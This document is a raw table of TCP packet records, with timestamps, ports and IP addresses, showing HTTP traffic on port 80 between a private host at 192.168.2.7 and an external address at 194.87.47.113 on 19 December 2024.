Dec 19, 2024 08:47:28.102554083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.103090048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.103132963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.103132963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.103132963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.103307962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.103907108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.104118109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.104403973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.104686975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.104780912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.104888916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.105482101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.105647087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.105652094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.106286049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.106501102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.106576920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.107175112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.107335091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.107402086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.107851982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.107975006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.108300924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.108675957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.108839035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.109498024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.109805107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.110285997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.110455036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.110512018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.110512018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.110512018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.111057043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.111241102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.111335039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.111797094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.112015009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.112662077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.113017082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.113122940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.113122940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.113454103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.113619089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.114130974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.114319086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.114326000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.114784956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.115087986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.115094900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.115336895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.115823030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.116019964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.116024017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.116589069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.116669893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.116740942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.117383003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.117479086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.117547035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.118212938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.118334055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.118343115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.118966103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.119029045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.119119883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.119767904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.119895935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.120074987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.120527029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.120702028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.120795965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.255248070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.255548954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.255821943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.255847931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.255856037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.256107092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.256545067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.256851912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.257196903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.257214069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.274319887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.274399042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.274494886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.274854898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.274862051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.274926901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.275475979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.275578976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.275827885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.276173115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.276247978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.276458979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.276552916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.276602030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.276937008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.277286053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.277355909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.278078079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.278084040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.278153896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.278423071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.278863907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.278968096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.279125929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.279675961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.279767036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.280181885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.280453920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.280518055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.280716896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.281265020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.281270981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.281398058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.282032013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.282125950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.282233953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.282542944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.282685041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.282689095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.283076048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.283219099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.283477068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.283761978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.283854961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.284254074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.284882069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.284986019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.285070896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.285079002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.285118103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.285958052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.286241055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.286298037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.286648035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.286655903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.286746025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.287432909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.287625074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.287674904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.288249969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.288466930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.288563967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.289002895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.289336920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.289437056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.289798975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.289982080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.290024042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.290580988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.290793896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.290867090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.291429043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.291435957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.291506052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.292217016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.292804956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.293004036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.293010950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.293030977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.293050051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.293741941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.294261932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.294429064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.294585943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.295038939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.295162916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.295345068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.295931101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.296005011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.296123981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.296504974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.296610117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.296943903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.297194958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.297398090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.297770023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.298340082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.298469067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.298549891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.298557043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.298623085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.299295902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.299984932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.300048113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.300203085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.300209999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.300261974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.300934076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.301232100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.301292896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.301670074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.301918030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.302014112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.302467108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.303153992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.303296089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.303462029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.303468943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.303582907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.304151058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.304481983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.304531097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.304855108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.304862022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.304949045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.305660963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.305902958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.306005001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.306441069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.306447983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.306549072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.307203054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.307439089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.307518959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.307988882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.308521032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.308597088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.308809996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.309609890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.309616089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.309669971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.309950113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.309997082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.310446024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.310673952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.310736895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.311168909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.311599970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.311676025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.311990023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.312899113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.312906981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.312959909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.313123941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.313182116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.671359062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.671371937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.671490908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.671664000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.671680927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.671879053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.672625065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.672633886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.672713995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.673682928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.673691988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.673827887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.676505089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.676515102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.676521063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.676628113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.677423954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.677474022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.677494049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.678453922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.678463936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.678472042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.678523064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.678523064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.679436922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.679457903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.679609060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.680391073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.680399895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.680449009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.681328058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.681337118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.681389093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.682308912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.682317972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.682362080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.683276892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.683286905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.683294058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.683339119 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.684253931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.684266090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.684279919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.684350967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.684350967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.685201883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.685210943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.685280085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.686183929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.686192989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.686283112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.687144995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.687154055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.687222004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.688107014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.688117981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.688285112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.689093113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.689109087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.689116955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.689183950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.690023899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.690073967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.690515041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.690526009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.690568924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.691531897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.691541910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.691618919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.692512989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.692523003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.692578077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.693404913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.693423986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.693490028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.694427013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.695353985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.695449114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.696310043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.696317911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.696420908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.697354078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.697362900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.697479963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.698265076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.698272943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.698322058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.699249983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.699259996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.699275017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.699321985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.700211048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.700221062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.700267076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.701184034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.701195002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.701270103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.702183962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.702193022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.702255964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.703109026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.703119993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.703135967 CET	80	49707	194.87.47.113	192.168.2.7
